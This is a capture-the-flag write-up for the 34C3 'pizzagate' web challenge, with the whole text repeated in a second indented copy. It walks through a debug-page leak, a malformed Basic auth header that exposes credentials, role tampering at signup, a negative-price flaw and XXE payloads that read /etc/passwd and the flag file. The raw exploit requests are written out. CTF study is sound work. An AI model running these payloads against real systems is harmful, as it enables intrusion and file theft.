pich4ya/pizzagate - hard-ish 401.txt

## pizzagate - hard-ish 401.txt
chall:
We found this pizza shop. It seems to be under construction currently, but we believe the whole shop is a just a front for some fishy business. Is the Italian Mafia behind all this?

Grab your OWASP Top 10 list and investigate! We need to find out what's going on!

Hints:
For the basic authentication step: Have you checked out A1 in your list? And the HTTP response headers?

http://35.198.69.56/

1) the site has debug mode enabled (stacktrace + detailed error)
http://35.198.69.56/x

^$ [name='index']
^admin
^robots.txt$
^foobarbaz/
^static\/(?P<path>.*)$

2) basic auth - http://35.198.69.56/foobarbaz/
HTTP/1.1 401 Unauthorized
Server: nginx/1.12.1 (Ubuntu)
Date: Fri, 29 Dec 2017 05:15:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
WWW-Authenticate: Basic realm=devs_only
X-Frame-Options: SAMEORIGIN

3) read the error with admin:"
Authorization: Basic YWRtaW46Ig%3d%3d

https://gist.github.com/pich4ya/1a199bf720ad773d4bea218729d323fe

I noticed

(b'<?xml version="1.0" encoding="UTF-8" ?>\n            <users>\n            '
 b'    <user>\n                    <firstname>Bernd</firstname>\n            '
 b'        <lastname>Brot</lastname>\n                    <login>bernd</logi'
 b'n>\n                    <password>berndberndbernd</password>\n            '
 b'        <role>inactive</role>\n                </user>\n                <u'
 b'ser>\n                    <firstname>Shia</firstname>\n                   '
 b' <lastname>TheOneANdOnly</lastname>\n                    <login>sh1a</log'
 b'in>\n                    <password>just_do_it_goddamnit</password>\n      '
 b'              <role>admin</role>\n                </user>\n            </u'
 b'sers>\n    ')

django 2.0
python 3.6.3
/app/foobarbaz/views.py
0.0.0.0:1337
dbms:mysql

install apps: pizzagate, foobarbaz

 4) enter pizzashop

 http://35.198.69.56/foobarbaz/
 sh1a:just_do_it_goddamnit

 reg & login

 5) dev mode
when signup

username=longcat3&password1=longcat3longcat3&password2=longcat3longcat3&csrfmiddlewaretoken=..&role=user

if changes user to admin, error > Invalid value &#39;admin&#39; for user role. Only &#39;user&#39; and &#39;dev&#39; supported.
so,

username=longcat3&password1=longcat3longcat3&password2=longcat3longcat3&csrfmiddlewaretoken=1UnExhdNDXuYC1EbIIVCpFFnnePNnfmOVzPTTjO5BJfwnC0WO6jKgFnu3DKzsc2u&role=dev

6) analysis

user can order pizza from a pre-defined list.
dev can create new pizza into the list.

Also, I found that in /foobarbaz/pizza/list, there is a hidden pizza
                 <!--
                <li><b>Pizza itanimullI</b> - Annuit coeptis - Novus ordo seclorum -  1337€</li>
                 -->
I tried to create new pizza with "Pizza itanimullI" and it wasn't work. This means it was already exist.
However, I couldn't order it because the price is 1337 euro and the newly create users have only 100 euro.

7) make money
With trial and errors, if dev user create new pizza with negative number of price, dev can gain more money.

7.1) create pizza with -1338 euro
POST /foobarbaz/pizza/create HTTP/1.1
csrfmiddlewaretoken=coYn78UOTCPLpEEhX0rJc0mn08XQbzl4sUTuxWaKFct3DnMSunMUUNkJvXq49B32&name=letmein2&toppings=letmein2&price=-1338
7.2) buy it
POST /foobarbaz/order/create HTTP/1.1
csrfmiddlewaretoken=pUlsAF3ayvWgBsD8FE3TVgFGblZiQIBEFqgz0tj6k5AyPbLJc1o4D3D2GaswOKjC&pizza=letmein2

dev user will get +1338 euro

In addition, if you try to make money with too large integer. the page will print out detailed error with some hints, illuminati keywords.

query
(b'UPDATE `foobarbaz_userprofile` SET `user_id` = 189, `balance` = 2147483745, '
 b"`role` = 'dev', `is_illuminati` = 0, `created_at` = '2017-12-29 16:31:22.936" <<
 b"691' WHERE `foobarbaz_userprofile`.`id` = 189")

...
        if enough_balance:
                order = Order(user=req.user, pizza=pizza)
                order.save()
                if pizza.name == FLAG_PIZZA: <<
                    req.user.profile.is_illuminati = True <<

8) buy the hidden pizza
with burp, enter the hidden pizza in "pizza" param.

POST /foobarbaz/order/create HTTP/1.1
csrfmiddlewaretoken=NL0l1SVcuohvRWUjxmrRPvU8oNk3Apyp3hVsrGb8gYVN5F2U4JM2xiSuTCNhyrgn&pizza=Pizza itanimullI

HTTP/1.1 302 Found
Location: /foobarbaz/illuminati

9) illuminati wtf
the illuminati page displays the content with fancy youtube & graphic.
there was a hidden functions where user can submit youtube id code & detail into the webpage.

    <script src="/static/js/illuminati.js"></script>
   ...
       $("#form").submit( function(form) {
        console.log(this);
        var xml = "<illuminato>";
        xml += "<details>" + this.details.value + "</details>";
        xml += "<video>" + this.video.value + "</video>";
        xml += "</illuminato>";

        $("<input />").attr("type", "hidden")
            .attr("name", "xml")
            .attr("value", xml)
            .appendTo(this)

        return true;
    });
    ...
so, the xml param contains XML... with the hint "Grab your OWASP Top 10 list" = XXE?

POST /foobarbaz/illuminati HTTP/1.1
csrfmiddlewaretoken=Mv5GWifwZ1bdS7g4lXCFzDsNokOTHFLL210Nm6vsLBPv6QoFSkXQhqq9T9h7FHtJ&details=1234x&video=1235y&xml=<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]><illuminato><details>sec5%26foo%3b</details><video>sec4</video></illuminato>

root:x:0:0:root:/root:/bin/bash
...
flagisinrootinthefileflag:x:1000:1000::/home/flagisinrootinthefileflag:

POST /foobarbaz/illuminati HTTP/1.1
csrfmiddlewaretoken=Mv5GWifwZ1bdS7g4lXCFzDsNokOTHFLL210Nm6vsLBPv6QoFSkXQhqq9T9h7FHtJ&details=1234x&video=1235y&xml=<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///flag"> ]><illuminato><details>sec6%26foo%3b</details><video>sec4</video></illuminato>


                     <div class="item  text-center">
                            <div class="container">
                                <h4><b>sec634C3_congratZ_you_know_owasp_and_are_in_the_illumi4nti
</b></h4>
                            </div>

flag is: 34C3_congratZ_you_know_owasp_and_are_in_the_illumi4nti
	chall:
	We found this pizza shop. It seems to be under construction currently, but we believe the whole shop is a just a front for some fishy business. Is the Italian Mafia behind all this?

	Grab your OWASP Top 10 list and investigate! We need to find out what's going on!

	Hints:
	For the basic authentication step: Have you checked out A1 in your list? And the HTTP response headers?

	http://35.198.69.56/

	1) the site has debug mode enabled (stacktrace + detailed error)
	http://35.198.69.56/x

	^$ [name='index']
	^admin
	^robots.txt$
	^foobarbaz/
	^static\/(?P<path>.*)$

	2) basic auth - http://35.198.69.56/foobarbaz/
	HTTP/1.1 401 Unauthorized
	Server: nginx/1.12.1 (Ubuntu)
	Date: Fri, 29 Dec 2017 05:15:38 GMT
	Content-Type: text/html; charset=utf-8
	Content-Length: 0
	Connection: close
	WWW-Authenticate: Basic realm=devs_only
	X-Frame-Options: SAMEORIGIN

	3) read the error with admin:"
	Authorization: Basic YWRtaW46Ig%3d%3d

	https://gist.github.com/pich4ya/1a199bf720ad773d4bea218729d323fe

	I noticed

	(b'<?xml version="1.0" encoding="UTF-8" ?>\n <users>\n '
	b' <user>\n <firstname>Bernd</firstname>\n '
	b' <lastname>Brot</lastname>\n <login>bernd</logi'
	b'n>\n <password>berndberndbernd</password>\n '
	b' <role>inactive</role>\n </user>\n <u'
	b'ser>\n <firstname>Shia</firstname>\n '
	b' <lastname>TheOneANdOnly</lastname>\n <login>sh1a</log'
	b'in>\n <password>just_do_it_goddamnit</password>\n '
	b' <role>admin</role>\n </user>\n </u'
	b'sers>\n ')

	django 2.0
	python 3.6.3
	/app/foobarbaz/views.py
	0.0.0.0:1337
	dbms:mysql

	install apps: pizzagate, foobarbaz

	4) enter pizzashop

	http://35.198.69.56/foobarbaz/
	sh1a:just_do_it_goddamnit

	reg & login

	5) dev mode
	when signup

	username=longcat3&password1=longcat3longcat3&password2=longcat3longcat3&csrfmiddlewaretoken=..&role=user

	if changes user to admin, error > Invalid value 'admin' for user role. Only 'user' and 'dev' supported.
	so,

	username=longcat3&password1=longcat3longcat3&password2=longcat3longcat3&csrfmiddlewaretoken=1UnExhdNDXuYC1EbIIVCpFFnnePNnfmOVzPTTjO5BJfwnC0WO6jKgFnu3DKzsc2u&role=dev

	6) analysis

	user can order pizza from a pre-defined list.
	dev can create new pizza into the list.

	Also, I found that in /foobarbaz/pizza/list, there is a hidden pizza
	<!--
	<li><b>Pizza itanimullI</b> - Annuit coeptis - Novus ordo seclorum - 1337€</li>
	-->
	I tried to create new pizza with "Pizza itanimullI" and it wasn't work. This means it was already exist.
	However, I couldn't order it because the price is 1337 euro and the newly create users have only 100 euro.

	7) make money
	With trial and errors, if dev user create new pizza with negative number of price, dev can gain more money.

	7.1) create pizza with -1338 euro
	POST /foobarbaz/pizza/create HTTP/1.1
	csrfmiddlewaretoken=coYn78UOTCPLpEEhX0rJc0mn08XQbzl4sUTuxWaKFct3DnMSunMUUNkJvXq49B32&name=letmein2&toppings=letmein2&price=-1338
	7.2) buy it
	POST /foobarbaz/order/create HTTP/1.1
	csrfmiddlewaretoken=pUlsAF3ayvWgBsD8FE3TVgFGblZiQIBEFqgz0tj6k5AyPbLJc1o4D3D2GaswOKjC&pizza=letmein2

	dev user will get +1338 euro

	In addition, if you try to make money with too large integer. the page will print out detailed error with some hints, illuminati keywords.

	query
	(b'UPDATE `foobarbaz_userprofile` SET `user_id` = 189, `balance` = 2147483745, '
	b"`role` = 'dev', `is_illuminati` = 0, `created_at` = '2017-12-29 16:31:22.936" <<
	b"691' WHERE `foobarbaz_userprofile`.`id` = 189")

	...
	if enough_balance:
	order = Order(user=req.user, pizza=pizza)
	order.save()
	if pizza.name == FLAG_PIZZA: <<
	req.user.profile.is_illuminati = True <<

	8) buy the hidden pizza
	with burp, enter the hidden pizza in "pizza" param.

	POST /foobarbaz/order/create HTTP/1.1
	csrfmiddlewaretoken=NL0l1SVcuohvRWUjxmrRPvU8oNk3Apyp3hVsrGb8gYVN5F2U4JM2xiSuTCNhyrgn&pizza=Pizza itanimullI

	HTTP/1.1 302 Found
	Location: /foobarbaz/illuminati

	9) illuminati wtf
	the illuminati page displays the content with fancy youtube & graphic.
	there was a hidden functions where user can submit youtube id code & detail into the webpage.

	<script src="/static/js/illuminati.js"></script>
	...
	$("#form").submit( function(form) {
	console.log(this);
	var xml = "<illuminato>";
	xml += "<details>" + this.details.value + "</details>";
	xml += "<video>" + this.video.value + "</video>";
	xml += "</illuminato>";

	$("<input />").attr("type", "hidden")
	.attr("name", "xml")
	.attr("value", xml)
	.appendTo(this)

	return true;
	});
	...
	so, the xml param contains XML... with the hint "Grab your OWASP Top 10 list" = XXE?

	POST /foobarbaz/illuminati HTTP/1.1
	csrfmiddlewaretoken=Mv5GWifwZ1bdS7g4lXCFzDsNokOTHFLL210Nm6vsLBPv6QoFSkXQhqq9T9h7FHtJ&details=1234x&video=1235y&xml=<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]><illuminato><details>sec5%26foo%3b</details><video>sec4</video></illuminato>

	root:x:0:0:root:/root:/bin/bash
	...
	flagisinrootinthefileflag:x:1000:1000::/home/flagisinrootinthefileflag:

	POST /foobarbaz/illuminati HTTP/1.1
	csrfmiddlewaretoken=Mv5GWifwZ1bdS7g4lXCFzDsNokOTHFLL210Nm6vsLBPv6QoFSkXQhqq9T9h7FHtJ&details=1234x&video=1235y&xml=<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///flag"> ]><illuminato><details>sec6%26foo%3b</details><video>sec4</video></illuminato>


	<div class="item text-center">
	<div class="container">
	<h4><b>sec634C3_congratZ_you_know_owasp_and_are_in_the_illumi4nti
	</b></h4>
	</div>

	flag is: 34C3_congratZ_you_know_owasp_and_are_in_the_illumi4nti